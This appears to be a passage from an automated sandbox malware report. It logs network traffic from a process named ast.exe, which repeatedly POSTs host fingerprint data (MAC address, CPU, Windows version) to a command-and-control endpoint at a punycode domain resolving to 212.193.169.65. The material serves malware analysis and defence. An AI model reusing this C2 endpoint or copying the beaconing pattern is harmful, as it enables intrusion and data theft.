                                                                                                                                          Nov 19, 2024 18:57:59.686662912 CET4433550136212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:59.917586088 CET4433550136212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:59.918363094 CET5013644335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:59.923233032 CET4433550136212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:59.925569057 CET5013644335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:59.925663948 CET5013644335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:57:59.930543900 CET4433550136212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:59.930862904 CET4433550136212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:57:59.930942059 CET5013644335192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.011590958 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.011634111 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.011749029 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.012157917 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.012170076 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.831283092 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.831686974 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.833101988 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.833112001 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.833468914 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.834382057 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.835721016 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.835764885 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.835884094 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.835916996 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.835956097 CET44350139212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:00.836162090 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:00.836162090 CET50139443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:01.210427999 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:01.210500002 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:01.210558891 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:01.211042881 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:01.211061001 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.041697025 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.041775942 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.043339968 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.043358088 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.043658018 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.093938112 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.168631077 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.169636011 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.169670105 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.169713974 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.169831038 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.169866085 CET44350142212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.169977903 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.169997931 CET50142443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.230693102 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.230740070 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.230803967 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.231513023 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.231527090 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.941731930 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.941802979 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.943291903 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.943306923 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.943564892 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.944263935 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.945153952 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.945189953 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.945302010 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.945327997 CET44350145212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:02.945372105 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:02.945463896 CET50145443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:03.480309010 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:03.480364084 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:03.480457067 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:03.480927944 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:03.480943918 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.367681026 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.367774963 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.369290113 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.369313002 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.369553089 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370162010 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.370755911 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.370781898 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370893002 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370918989 CET44350148212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.370970011 CET50148443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380078077 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380142927 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:04.380319118 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380732059 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:04.380745888 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.173754930 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.173913002 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.176992893 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.177004099 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.177236080 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.178006887 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.178832054 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.178836107 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180490971 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180607080 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180633068 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180649996 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180658102 CET44350151212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.180686951 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180706024 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.180744886 CET50151443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.213300943 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.213345051 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:05.213541985 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.215620995 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:05.215647936 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.047981977 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.048135996 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.073381901 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.073415041 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.073679924 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.075750113 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.078994036 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079021931 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079130888 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079138994 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079169989 CET44350154212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.079250097 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.079250097 CET50154443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.494982004 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495032072 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:06.495289087 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495635033 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:06.495657921 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.215379000 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.215570927 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.217078924 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.217101097 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.217365980 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.218247890 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.218405008 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.218414068 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219333887 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219373941 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219465017 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219492912 CET44350157212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.219537973 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.219562054 CET50157443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.275336981 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.275377989 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:07.275563002 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.276770115 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:07.276784897 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.097312927 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.097390890 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.098967075 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.098974943 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.099230051 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.099999905 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100760937 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100794077 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.100866079 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.100918055 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.100946903 CET44350160212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.101030111 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.101046085 CET50160443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170046091 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170093060 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.170212030 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170814037 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:08.170833111 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.895153046 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:08.895231009 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.240673065 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.240705013 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.241091013 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.241678953 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250463009 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250498056 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250649929 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250665903 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250689983 CET44350163212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.250744104 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.250744104 CET50163443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326118946 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326159000 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:13.326242924 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326888084 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:13.326903105 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.118185043 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.118344069 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.119647026 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.119663954 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.119900942 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.120521069 CET50166443192.168.2.5212.193.169.65
                                                                                                                                          Nov 19, 2024 18:58:14.167323112 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.490720987 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.490801096 CET44350166212.193.169.65192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.491159916 CET50166443192.168.2.5212.193.169.65

                                                                                                                                          UDP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Nov 19, 2024 18:57:08.096637964 CET6250553192.168.2.51.1.1.1
                                                                                                                                          Nov 19, 2024 18:57:08.385417938 CET53625051.1.1.1192.168.2.5
                                                                                                                                          Nov 19, 2024 18:58:14.491585970 CET5397553192.168.2.51.1.1.1
                                                                                                                                          Nov 19, 2024 18:58:14.544210911 CET53539751.1.1.1192.168.2.5

                                                                                                                                          DNS Queries

                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Nov 19, 2024 18:57:08.096637964 CET192.168.2.51.1.1.10xc1e0Standard query (0)id.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false
                                                                                                                                          Nov 19, 2024 18:58:14.491585970 CET192.168.2.51.1.1.10xec22Standard query (0)id.xn--80akicokc0aablc.xn--p1aiA (IP address)IN (0x0001)false

                                                                                                                                          DNS Answers

                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Nov 19, 2024 18:57:08.385417938 CET1.1.1.1192.168.2.50xc1e0No error (0)id.xn--80akicokc0aablc.xn--p1ai212.193.169.65A (IP address)IN (0x0001)false
                                                                                                                                          Nov 19, 2024 18:58:14.544210911 CET1.1.1.1192.168.2.50xec22No error (0)id.xn--80akicokc0aablc.xn--p1ai212.193.169.65A (IP address)IN (0x0001)false

                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                          • id.xn--80akicokc0aablc.xn--p1ai:443

                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.549977212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:09 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:09 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.549986212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:11 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:11 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.549989212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:12 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:12 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.549995212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:14 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:14 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                                          Data Ascii: 1M1C-F4-BB-57-0D-C9HS53687091200HVdltngbmumrhtHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-1927990/Microsoft Windows 10 Pro (10.0.


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.549998212.193.169.654433380C:\Users\user\AppData\Roaming\template\ast.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-11-19 17:57:15 UTC134OUTPOST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
                                                                                                                                          Host: id.xn--80akicokc0aablc.xn--p1ai:443
                                                                                                                                          Content-Length: 269
                                                                                                                                          2024-11-19 17:57:15 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 31 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 64 6c 74 6e 67 62 6d 75 6d 72 68 74 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 31 39 32 37 39 39 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
